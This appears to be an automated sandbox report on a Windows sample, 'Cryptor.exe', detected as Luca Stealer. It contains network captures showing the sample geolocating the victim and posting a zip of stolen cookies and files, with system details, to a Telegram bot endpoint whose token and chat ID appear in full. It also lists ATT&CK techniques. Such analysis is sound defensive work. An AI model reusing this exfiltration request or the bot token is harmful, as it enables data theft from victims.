Jun 1, 2024 18:36:58.360687017 CEST	192.168.2.4	1.1.1.1	0xe87b	Standard query (0)	ipwho.is	A (IP address)	IN (0x0001)	false
Jun 1, 2024 18:37:10.479676008 CEST	192.168.2.4	1.1.1.1	0xe3d2	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 1, 2024 18:36:58.367981911 CEST	1.1.1.1	192.168.2.4	0xe87b	No error (0)	ipwho.is		195.201.57.90	A (IP address)	IN (0x0001)	false
Jun 1, 2024 18:37:10.487155914 CEST	1.1.1.1	192.168.2.4	0xe3d2	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Jun 1, 2024 18:37:18.811469078 CEST	1.1.1.1	192.168.2.4	0x598	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jun 1, 2024 18:37:18.811469078 CEST	1.1.1.1	192.168.2.4	0x598	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

ipwho.is

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	195.201.57.90	80	6388	C:\Users\user\Desktop\Cryptor.exe

Timestamp	Bytes transferred	Direction	Data
Jun 1, 2024 18:36:58.397267103 CEST	59	OUT	GET /?output=json HTTP/1.1 accept: / host: ipwho.is
Jun 1, 2024 18:36:59.219366074 CEST	941	IN	HTTP/1.1 200 OK Date: Sat, 01 Jun 2024 16:36:59 GMT Content-Type: application/json; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Server: ipwhois Access-Control-Allow-Headers: * X-Robots-Tag: noindex Data Raw: 32 62 64 0d 0a 7b 22 69 70 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 22 54 58 22 2c 22 63 69 74 79 22 3a 22 44 61 6c 6c 61 73 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 32 2e 37 37 36 36 36 34 32 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 39 36 2e 37 39 36 39 38 37 39 2c 22 69 73 5f 65 75 22 3a 66 61 6c 73 65 2c 22 70 6f 73 74 61 6c 22 3a 22 37 35 32 30 31 22 2c 22 63 61 6c 6c 69 6e 67 5f 63 6f 64 65 22 3a 22 31 22 2c 22 63 61 70 69 74 61 6c 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e 22 2c 22 62 6f 72 64 65 72 73 22 [TRUNCATED] Data Ascii: 2bd{"ip":"173.254.250.91","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"Texas","region_code":"TX","city":"Dallas","latitude":32.7766642,"longitude":-96.7969879,"is_eu":false,"postal":"75201","calling_code":"1","capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},"connection":{"asn":8100,"org":"QuadraNet, Inc","isp":"Quadranet Enterprises LLC","domain":""},"timezone":{"id":"America\/Chicago","abbr":"CDT","is_dst":true,"offset":-18000,"utc":"-05:00","current_time":"2024-06-01T11:36:59-05:00"}}0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	149.154.167.220	443	6388	C:\Users\user\Desktop\Cryptor.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-01 16:37:11 UTC	1185	OUT	POST /bot6639722633:AAFNcbBsUJUAQOXZmv9IESvAjulFnDaVzUA/sendDocument?chat_id=-4003506161&caption=%0A-%20IP%20Info%20-%0A%0AIP:%20173.254.250.91%0ACountry:%20United%20States%0ACity:%20Dallas%0APostal:%2075201%0AISP:%20Quadranet%20Enterprises%20LLC%20-%20A8100%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%20RZTBNVDC%20(1280,%201024)%0AHWID:%203165415708104312%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\Cryptor.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%2025%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2020%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0AOthers:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1 content-type: multipart/form-data; boundary=1e2bc9e1558d1d3c-3ca81ea8819fc179-863c2ef7186280ce-fd1fe01ce8266f14 content-length: 893620 accept: / host: api.telegram.org
2024-06-01 16:37:11 UTC	15199	OUT	Data Raw: 2d 2d 31 65 32 62 63 39 65 31 35 35 38 64 31 64 33 63 2d 33 63 61 38 31 65 61 38 38 31 39 66 63 31 37 39 2d 38 36 33 63 32 65 66 37 31 38 36 32 38 30 63 65 2d 66 64 31 66 65 30 31 63 65 38 32 36 36 66 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 55 53 5d 5f 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 00 00 30 8d c1 58 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 41 75 74 6f 66 69 6c 6c 2f 50 4b 03 04 14 00 00 00 00 00 30 8d c1 58 00 00 00 00 00 00 00 00 00 00 00 00 08 Data Ascii: --1e2bc9e1558d1d3c-3ca81ea8819fc179-863c2ef7186280ce-fd1fe01ce8266f14Content-Disposition: form-data; name="document"; filename="[US]_173.254.250.91.zip"Content-Type: application/zipPK0XAutofill/PK0X
2024-06-01 16:37:11 UTC	16384	OUT	Data Raw: 80 24 6a ad 64 26 99 49 66 72 3f 49 00 d8 26 22 90 84 6d 6c 03 20 09 49 d8 26 33 09 89 88 20 33 19 c7 11 49 74 5d 47 66 22 89 d6 1a 11 81 6d 5a 6b d4 5a 91 84 6d 5a 6b 64 26 a5 14 4a 29 00 d8 06 40 86 cc c4 36 00 11 81 24 32 93 cc a4 d6 ca fd 6c 93 99 00 44 04 92 98 a6 89 88 20 22 90 04 80 6d 00 24 61 9b d6 1a b6 89 08 22 82 07 1a 86 81 ae eb 98 a6 09 67 52 bb 8e cc 24 33 99 cd 66 8c e3 c8 fd 24 21 09 00 db 64 26 b3 da 91 99 d8 c6 36 11 c1 fd 6c 63 1b 49 48 22 22 00 b0 4d 6b 8d cc a4 eb 3a 00 24 21 89 d6 1a 99 89 24 22 02 db d8 c6 36 cf cd 36 a5 14 32 13 db 00 44 04 11 81 24 00 da 34 61 1b db 00 44 04 92 b8 9f 6d 20 b1 85 dd 88 a8 44 80 2d 5a 1b e9 ba 19 90 d8 c2 6e d8 42 32 52 41 32 d2 77 ef 19 c0 36 ff 1e 9f f4 a0 03 5e ee 84 79 d0 89 0d fa 1a 3c ee be Data Ascii: $jd&Ifr?I&"ml I&3 3It]Gf"mZkZmZkd&J)@6$2lD "m$a"gR$3f$!d&6lcIH""Mk:$!$"662D$4aDm D-ZnB2RA2w6^y<
2024-06-01 16:37:11 UTC	16384	OUT	Data Raw: 7c f1 c3 3f 83 07 b2 cd bf 47 f0 c2 d9 e6 3f 93 cc 0b 25 09 db 3c 90 6d fe ab d8 e6 85 91 f9 4f 65 9b 17 26 cc 8b 4c 12 b6 01 b0 8d 6d 24 f1 ef 21 07 2f 8c 6d fe 33 d9 e6 85 09 5e 34 b6 b1 cd fd 22 02 49 64 26 2f 8c cc 8b cc 36 ff 11 24 f1 2c 69 1e c8 36 cf 4f 98 cb 6c f3 1f c9 36 2f 8c f8 f7 b1 cd 0b 97 fc 5b 48 02 40 13 ff 21 6c f3 a2 b0 cd bf 86 78 e1 6c f3 ef a1 34 ff 2e 69 fe 23 d8 c6 36 00 92 f8 d7 0a f3 2c b6 79 6e e2 df c6 36 2f 8c cc b3 d8 e6 5f 62 9b 17 45 98 17 89 78 e1 6c 03 20 89 fb d9 06 c0 36 92 00 b0 cd 03 d9 06 a0 20 5e 18 99 e7 61 9b 17 c4 36 cf 8f 24 1e c8 36 97 a5 79 7e 6c 03 60 9b 88 00 c0 36 b6 91 04 80 6d 24 f1 c2 04 cf c9 36 0f 24 89 e7 66 9b fb c9 bc 50 92 b0 8d 6d 6c f3 dc 4a 29 28 4d 66 62 1b 00 49 48 42 12 ad 35 24 f1 dc 24 71 Data Ascii: \|?G?%<mOe&Lm$!/m3^4"Id&/6$,i6Ol6/[H@!lxl4.i#6,yn6/_bExl 6 ^a6$6y~l`6m$6$fPmlJ)(MfbIHB5$$q
2024-06-01 16:37:11 UTC	16384	OUT	Data Raw: 36 61 90 84 24 24 61 1b db 88 17 ce 36 92 00 b0 0d 80 6d 22 02 49 0c c3 80 22 88 08 24 01 60 1b db 00 44 04 ad 35 6c 13 11 48 c2 36 b6 01 e8 a2 c3 36 99 89 6d 00 22 02 49 00 64 26 92 c8 4c 6c 03 20 09 00 db 48 46 12 f7 b3 8d 6d 00 24 a1 34 00 11 81 24 6c 93 99 00 44 04 b8 11 11 00 64 26 b6 01 90 84 6d 22 82 e7 c7 36 b6 11 85 cc 24 33 91 84 24 24 61 1b db 48 c2 36 00 11 01 80 6d 6c 03 10 bc 60 b6 89 08 ee 67 1b db d8 e6 7e 45 95 fb 49 42 12 99 89 6d 00 22 82 07 b2 cd fd 24 41 1a 00 db 64 26 99 09 80 24 24 f1 dc 24 71 bf cc 04 40 12 11 01 80 6d 6c 73 3f db 94 52 90 44 66 62 9b fb 65 26 72 a3 d6 0a 40 6b 0d 49 74 5d 87 6d c6 71 a4 94 42 66 62 1b db 48 42 12 92 90 84 5b 12 11 64 26 b6 89 08 32 13 db d4 5a c9 4c 32 93 52 0a ad 35 00 6a ad 8c e3 88 24 0a 02 c0 Data Ascii: 6a$$a6m"I"$`D5lH66m"Id&Ll HFm$4$lDd&m"6$3$$aH6ml`g~EIBm"$Ad&$$$q@mls?RDfbe&r@kIt]mqBfbHB[d&2ZL2R5j$
2024-06-01 16:37:11 UTC	16384	OUT	Data Raw: 9b fb d9 e6 81 24 01 20 27 f7 b3 cd 03 d9 46 12 00 b6 79 7e 64 5e 64 b6 79 6e 89 01 90 c4 f3 23 09 db 3c 37 db 60 d3 45 01 c0 36 99 89 6d 00 02 21 89 fb d9 06 40 12 f7 b3 0d 21 6c 23 f3 2c 92 b0 cd fd 6c 13 06 db 00 48 42 12 92 70 26 00 b6 79 6e 92 68 ad 11 11 4c d3 44 29 05 49 d8 a6 d6 4a 66 62 9b 07 b2 0d 80 cc b3 b4 d6 88 08 22 82 d6 1a 00 92 b0 4d 29 1d 99 49 66 02 10 11 44 04 b6 b1 0d 80 6d 6c 23 09 00 db 00 48 82 36 21 09 49 48 c2 36 0f 64 1b 49 48 e2 7e b6 b1 0d 40 20 6c 03 10 11 d8 26 33 01 90 c4 f3 63 1b 00 db 74 a5 90 99 48 02 20 33 91 84 24 32 13 00 49 00 d8 06 40 12 00 99 09 69 24 21 89 cc 04 20 22 90 04 80 6d 6c 03 20 09 49 00 64 26 99 49 26 74 5d 47 44 90 99 d8 26 22 b0 4d 6b 8d 40 00 48 42 12 b6 01 b0 cd fd 6c 23 89 52 0a 00 ad 35 6c 23 09 Data Ascii: $ 'Fy~d^dyn#<7`E6m!@!l#,lHBp&ynhLD)IJfb"M)IfDml#H6!IH6dIH~@ l&3ctH 3$2I@i$! "ml Id&I&t]GD&"Mk@HBl#R5l#
2024-06-01 16:37:11 UTC	16384	OUT	Data Raw: 38 8e 00 d4 5a 91 44 6b 8d 88 c0 36 32 48 02 c0 36 00 11 81 6d 32 93 cc 44 12 a5 14 22 02 db d8 06 c0 36 99 09 40 44 90 99 64 26 a5 14 5a 33 00 a5 14 22 82 d6 1a d3 38 12 a5 d0 f7 3d b4 09 db d8 06 c0 36 b6 91 84 24 24 91 99 00 48 42 12 99 49 66 02 10 11 48 02 20 33 b1 0d 40 44 70 45 70 3f db 3c b7 ae 54 6c 63 9b fb d9 26 33 b1 4d 29 05 db 00 48 c2 36 99 49 29 85 5a 2b c3 30 10 11 48 c2 36 b6 b9 9f 6d 00 24 61 1b db 48 22 22 b0 4d 6b 8d aa 00 c0 36 92 90 04 40 66 62 1b db 48 22 22 00 c8 4c 32 93 88 a0 d6 4a 66 22 09 db 64 26 00 11 81 24 6c 53 4a 21 33 c9 4c 6c f3 40 92 b0 4d 44 00 90 99 d8 26 22 b0 4d 66 d2 75 1d d3 34 21 89 5a 2b 99 c9 34 4d 44 04 7d df 33 ac d7 48 22 22 88 08 32 93 69 9a 90 44 ad 95 69 9a 88 08 22 02 00 db 00 64 26 99 89 24 ee 27 09 49 Data Ascii: 8ZDk62H6m2D"6@Dd&Z3"8=6$$HBIfH 3@DpEp?<Tlc&3M)H6I)Z+0H6m$aH""Mk6@fbH""L2Jf"d&$lSJ!3Ll@MD&"Mfu4!Z+4MD}3H""2iDi"d&$'I
2024-06-01 16:37:11 UTC	16384	OUT	Data Raw: fe 7d 6c f3 ef 21 f3 6f 62 9b ff 6a b6 79 6e 32 ff a1 6c f3 af 11 e6 85 b2 0d 80 24 1e c8 36 2f 0a f1 9c 6c f3 df c9 36 0f 14 0e fe 33 d8 e6 45 21 f3 af 66 9b 17 95 1c 3c 90 6d fe 23 29 cd 7f 04 db 3c 3f 32 ff 2e b2 79 51 d8 e6 df c3 36 cf 8f cc bf 8a 6d fe 35 64 9e 87 6d 5e 54 c1 73 b2 cd 7f a8 34 ff 16 61 9e 83 6d 1e c8 36 2f 0a 99 17 ca 36 ff 1e b6 79 20 f1 9c 24 61 1b db 00 14 c4 f3 63 9b e7 47 e6 59 24 01 60 9b fb d9 e6 b9 d9 e6 81 24 f1 fc d8 06 25 0f 14 e6 99 02 00 db 3c 87 34 97 39 b8 4c c9 7f 34 db c8 5c 96 99 48 22 22 00 b0 8d 6d c2 20 09 db 3c 3f b6 79 20 49 dc cf 36 00 b6 09 89 fb 49 02 c0 36 f7 93 84 6d 6c 23 09 00 db d8 e6 8a e4 7e 92 78 7e da 34 11 a5 20 89 36 4d 28 82 52 0a ad 35 2a c2 36 b6 91 44 44 20 09 db d8 c6 36 00 92 b0 8d 6d 00 22 Data Ascii: }l!objyn2l$6/l63E!f<m#)<?2.yQ6m5dm^Ts4am6/6y $acGY$`$%<49L4\H""m <?y I6I6ml#~x~4 6M(R5*6DD 6m"
2024-06-01 16:37:11 UTC	16384	OUT	Data Raw: 4a 29 00 b4 d6 90 44 ad 95 71 1c 91 c4 03 45 04 00 99 49 6b 8d 5a 2b 92 c8 4c 6c 13 11 48 c2 36 b6 01 90 c4 fd 6c 03 60 1b 00 49 48 e2 b9 49 42 12 ad 35 24 51 4a 21 33 99 a6 09 80 ae eb c8 4c 00 6c d3 5a c3 36 11 41 44 00 50 10 cf cd 36 b6 01 c8 4c 24 21 09 49 dc 4f 12 00 e3 38 12 11 48 c2 36 b6 91 84 24 00 a4 1f 5c 19 c0 36 0f 24 09 00 db 3c 0f 1b a6 35 af f7 db df c6 47 ff d8 27 f2 bf c1 d7 be e5 67 f3 1b af f5 81 b0 d8 86 52 b9 9f 6d 5e 18 49 bc 30 b6 f9 f7 18 5f f7 47 d8 bf e7 2f c1 13 28 90 84 24 24 21 09 10 8a 40 12 92 50 04 48 84 04 0a a4 00 09 29 40 22 14 10 01 04 52 b0 db 66 9c fa fd 0f e2 3f 8b cc 0b 65 9b ff 08 9f fc b8 cf e2 73 3e ef 0b f9 cf f0 59 9f f1 a9 7c ce e7 7d 21 3f f5 93 3f ce 5f ff d5 5f f2 0b 37 bc 0d 7f 7b ec 65 78 91 88 17 20 79 Data Ascii: J)DqEIkZ+LlH6l`IHIB5$QJ!3LlZ6ADP6L$!IO8H6$\6$<5G'gRm^I0_G/($$!@PH)@"Rf?es>Y\|}!??__7{ex y
2024-06-01 16:37:11 UTC	16384	OUT	Data Raw: 77 b1 cd 0b 13 fc eb d9 e6 5f 22 f3 1c 6c f3 1f c1 36 0f 24 f3 5f 22 0c b6 f9 8f 26 5e 38 db bc 30 e6 f9 13 2f 5c 98 cb 1a e6 5f cb 36 f7 2b 19 bc 28 6c f3 af 21 09 00 db bc 30 89 79 20 99 17 4a e6 39 24 06 40 e6 85 92 cd f3 23 f3 7c 49 02 20 33 f9 8f 66 9b fb 95 e4 85 b2 cd 7f 04 db bc 48 6c 5e 10 db 84 79 0e 92 00 b0 cd f3 23 f3 3c 6c f3 a2 b2 0d 40 f0 fc c9 3c 8b 6d 6c 03 20 09 49 00 d8 c6 36 00 92 b8 9f 6d 64 90 c4 fd 6c 03 60 9b 07 92 04 80 6d 6c 03 20 89 07 b2 0d 80 24 9e 9b 6d 6c 73 3f 49 5c d6 12 00 49 44 04 b6 c9 4c 6c 13 11 d8 06 40 12 f7 93 c4 fd dc 40 12 0f 64 1b 00 db 44 04 b6 b1 cd fd 24 f1 2c 39 21 89 fb d9 e6 81 24 f1 40 b6 01 90 84 24 6c 93 99 d4 5a 69 ad e1 96 44 04 99 49 29 85 fb d9 06 40 3c 9b 6d 1e c8 36 99 09 80 24 24 51 15 00 d8 26 Data Ascii: w_"l6$_"&^80/\_6+(l!0y J9$@#\|I 3fHl^y#<l@<ml I6mdl`ml $mls?I\IDLl@@dD$,9!$@$lZiDI)@<m6$$Q&
2024-06-01 16:37:11 UTC	16384	OUT	Data Raw: df e5 60 39 f2 dc 7e e3 2b df 86 ae eb f8 95 5f fe 65 fc ce 6f c1 7f a7 bf bf ee d1 7c ca bb 7f 13 ba f6 a1 70 fc 5a ee 27 89 17 c6 36 2f 8c 53 fc 7b f8 75 bf 0b 6c 70 02 09 4e c0 60 20 3a ee 7d c6 5f 10 12 2a 41 91 50 04 8a 20 24 14 81 14 48 22 4a 20 05 a1 80 08 a4 40 11 a0 20 42 a0 42 fc da 07 41 14 88 0a b5 07 09 a5 f9 f7 49 fe b5 24 f1 fc d8 e6 05 f9 e4 bf ff 6c 3e e7 f3 be 90 ff 4e 9f f5 19 9f ca 17 bd d8 67 f1 40 e2 df c9 c1 f3 63 9b 17 85 24 9e 9b 6d 5e 54 e2 3f 96 6d fe 4b 39 80 e0 d9 92 07 0a ee 97 fc eb 04 0f 64 9b 07 12 05 80 54 82 00 03 02 cc f3 b2 b9 9f 78 4e 72 80 83 fb 59 3c 07 8b e7 4f e2 32 1b 04 20 90 90 84 24 24 21 89 e7 26 20 33 b1 4d 38 71 4e c8 0d 00 db d8 c6 36 00 b6 91 c4 0b 23 83 6d fe cd 1c fc 4b 6c 03 80 0d 00 12 00 92 c0 e6 45 Data Ascii: `9~+_eo\|pZ'6/S{ulpN` :}_*AP $H"J @ BBAI$l>Ng@c$m^T?mK9dTxNrY<O2 $$!& 3M8qN6#mKlE
2024-06-01 16:37:13 UTC	389	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 01 Jun 2024 16:37:12 GMT Content-Type: application/json Content-Length: 1269 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Target ID:	0
Start time:	12:36:57
Start date:	01/06/2024
Path:	C:\Users\user\Desktop\Cryptor.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Cryptor.exe"
Imagebase:	0x7ff620fa0000
File size:	3'037'184 bytes
MD5 hash:	4CA40D9D318D97D68FCB518E2C4FE07A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000002.1818390971.00007FF6213B0000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000003.1816751738.0000020DA5C09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000002.1817452314.0000020DA5C09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000003.1816891652.0000020DA5C09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:36:58
Start date:	01/06/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture \| Select -ExpandProperty DisplayName"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:36:58
Start date:	01/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
